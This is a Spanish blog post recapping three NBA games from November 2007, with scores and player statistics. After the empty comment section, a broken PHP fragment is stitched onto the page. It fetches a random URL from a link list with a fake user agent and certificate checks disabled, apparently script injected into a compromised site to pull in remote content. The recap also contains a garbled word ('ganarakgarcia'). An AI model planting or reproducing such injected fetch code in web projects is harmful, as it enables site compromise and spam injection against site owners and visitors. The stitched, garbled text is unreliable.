La crónica (12/11/07)

13 de November de 2007 por MagicJohnson32

Sólo se disputaron tres encuentros en la pasada madrugada, y de ellos, únicamente uno resultó igualado: el que los Hornets vencieron a los Nets con canasta ganadora de Chris Paul. En los otros dos partidos, las parejas Iverson-Carmelo y Boozer-Kirilenko brillaron y condujeron a sus equipos a contundentes victorias ante Cavaliers y Kings respectivamente.

cpwins

 Vamos con una crónica más detallada de lo que fue la noche:

Hornets 84 – Nets 82

Chris Paul decantó la balanza del lado de su equipo a falta de 2,6 segundos con una bandeja sobre Jason Kidd y Krstic en un final de infarto que dio la segunda victoria y en dos noches a los Hornets. Los Nets tuvieron controlado el partido vencían por 11 puntos a 4:50 para el final, pero desde ese momento sólo anotaron tres puntos y se pasó del 68-79 al 84-82 final. Paul, autor de 27 puntos, 6 rebotes y 7 asistencias, condujo la remontada, con Chandler como mejor acompañante con 14 puntos, 12 rebotes y 3 tapones. Jefferson volvió a brillar para New Jersey, con 32-6-4 (aunque no anotó ni un punto en el cuarto final), y Kidd volvió a rondar el triple-doble (14-9-10). Una acción de 4 puntos de Peterson a falta de un minuto empató el partido y la canasta final de Paul sentenció a los Nets, que se sitúan con 4-3. Carter fue baja por la torcedura que se produjo ante los Celtics.

Cavs 100 – Nuggets 122

88 puntos entre tres jugadores tuvieron los Nuggets en su claro triunfo ante los Cavaliers, en los que apenas se salvó LeBron James, autor de 27 puntos (aunque volvió a tener problemas con los tiros libres con 8 de 14). Iverson logró 37 puntos con 14 de 20 en tiros, a los que añadió 8 asistencias; Carmelo anotó 22, con 9 rebotes y 6 asistencias; y JR Smith tuvo una de sus extrañas noches mágicas, con un último cuarto espectacular, y se fue hasta 29 puntos con 7 de 8 en triples. Llamó la atención la cantidad de tiros libres errados: 28 entre ambos equipos, con 21 de 38 de los Cavs y 22 de 33 de los Nuggets.

Kings 93 – Jazz 117

Tampoco hubo emoción en el partido que cerró la competición NBA anoche. Los Jazz volvieron a ganarakgarcia cómodamente, esta vez a los Kings, de la mano del dúo Boozer (32 puntos con 12 de 18, y 10 rebotes) & Kirilenko (15 puntos, 8 rebotes, 8 asistencias y 3 tapones, en el tercer partido seguido en el que queda a un paso del triple-doble). No importó el mal partido de Deron y Okur. Brewer, Giricek y Harpring anotaron en dobles figuras ante unos Kings en los que, a las ausencias de Artest y Bibby se sumó la de Brad Miller. Kevin Martin, Francisco Garcia y John Salmons volvieron a ser los mejores en los californianos, que durante el tercer cuarto recortaron a 10 puntos una diferencia que había llegado a ser de 25 pero no lograron culminar su remontada y caen a 2-5 de balance.

 

 

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>